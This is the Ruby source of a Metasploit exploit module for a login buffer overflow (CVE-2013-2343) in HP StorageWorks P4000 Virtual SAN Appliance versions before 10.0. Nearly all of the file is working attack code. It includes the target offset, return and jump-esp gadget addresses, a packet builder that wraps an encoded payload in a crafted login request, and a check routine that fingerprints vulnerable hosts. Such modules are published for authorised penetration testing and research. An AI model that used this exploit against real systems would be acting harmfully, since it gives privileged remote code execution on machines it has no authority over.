1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => "HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow",
16
        'Description' => %q{
17
          This module exploits a buffer overflow vulnerability found in HP's StorageWorks
18
          P4000 VSA on versions prior to 10.0. The vulnerability is due to an insecure usage
19
          of the sscanf() function when parsing login requests. This module has been tested
20
          successfully on the HP VSA 9 Virtual Appliance.
21
        },
22
        'License' => MSF_LICENSE,
23
        'Author' => [
24
          'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability Discovery
25
          'juan vazquez' # Metasploit module
26
        ],
27
        'References' => [
28
          ['CVE', '2013-2343'],
29
          ['OSVDB', '94701'],
30
          ['ZDI', '13-179'],
31
          ['URL', 'http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c03661318']
32
        ],
33
        'Payload' => {
34
          'BadChars' => "\x2f\x00\x0d\x0a",
35
          'Space' => 780,
36
          'DisableNops' => true,
37
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
38
        },
39
        'DefaultOptions' => {
40
          'EXITFUNC' => 'thread'
41
        },
42
        'Platform' => ['linux'],
43
        'Arch' => ARCH_X86,
44
        'Targets' => [
45
          [
46
            'HP VSA 9',
47
            {
48
              'Version' => '9.0.0',
49
              'Offset' => 3446,
50
              'Ret' => 0x0804EB34, # pop ebp # ret # from hydra
51
              'FakeObject' => 0x08072E58, # from hydra data
52
              'JmpEsp' => 0x08050CB8 # push esp # ret # from hydra
53
            }
54
          ]
55
        ],
56
        'Privileged' => true,
57
        'DisclosureDate' => '2013-06-28',
58
        'DefaultTarget' => 0,
59
        'Notes' => {
60
          'Reliability' => UNKNOWN_RELIABILITY,
61
          'Stability' => UNKNOWN_STABILITY,
62
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
63
        }
64
      )
65
    )
66

67
    register_options(
68
      [
69
        OptPort.new('RPORT', [true, 'The remote port', 13838])
70
      ]
71
    )
72
  end
73

74
  def check
75
    connect
76
    packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{target['Version']}\"")
77
    vprint_status("#{rhost}:#{rport} Sending login packet to check...")
78
    sock.put(packet)
79
    res = sock.get_once
80
    disconnect
81

82
    if res and res =~ /OK/ and res =~ /Login/
83
      return Exploit::CheckCode::Appears
84
    elsif res and res =~ /FAILED/ and res =~ /version/
85
      return Exploit::CheckCode::Detected
86
    end
87

88
    return Exploit::CheckCode::Safe
89
  end
90

91
  def generate_packet(data)
92
    pkt = "\x00\x00\x00\x00\x00\x00\x00\x01"
93
    pkt << [data.length + 1].pack("N*")
94
    pkt << "\x00\x00\x00\x00"
95
    pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"
96
    pkt << "\x00\x00\x00\x14\xff\xff\xff\xff"
97
    pkt << data
98
    pkt << "\x00"
99

100
    pkt
101
  end
102

103
  def exploit
104
    connect
105
    print_status("#{rhost}:#{rport} Sending login packet")
106
    my_bof = rand_text(target['Offset'])
107
    my_bof << [target.ret].pack("V")
108
    my_bof << [target['FakeObject']].pack("V") # Pointer to Fake Object in order to survive LHNSessionManager::SendMessage before ret
109
    my_bof << [target['JmpEsp']].pack("V")
110
    my_bof << payload.encoded
111

112
    packet = generate_packet("login:/#global$agent/#{my_bof}/#{rand_text_alpha(5)}/Version \"1\" ") # Fake version in order to ret asap
113
    sock.put(packet)
114
    disconnect
115
  end
116
end
117

118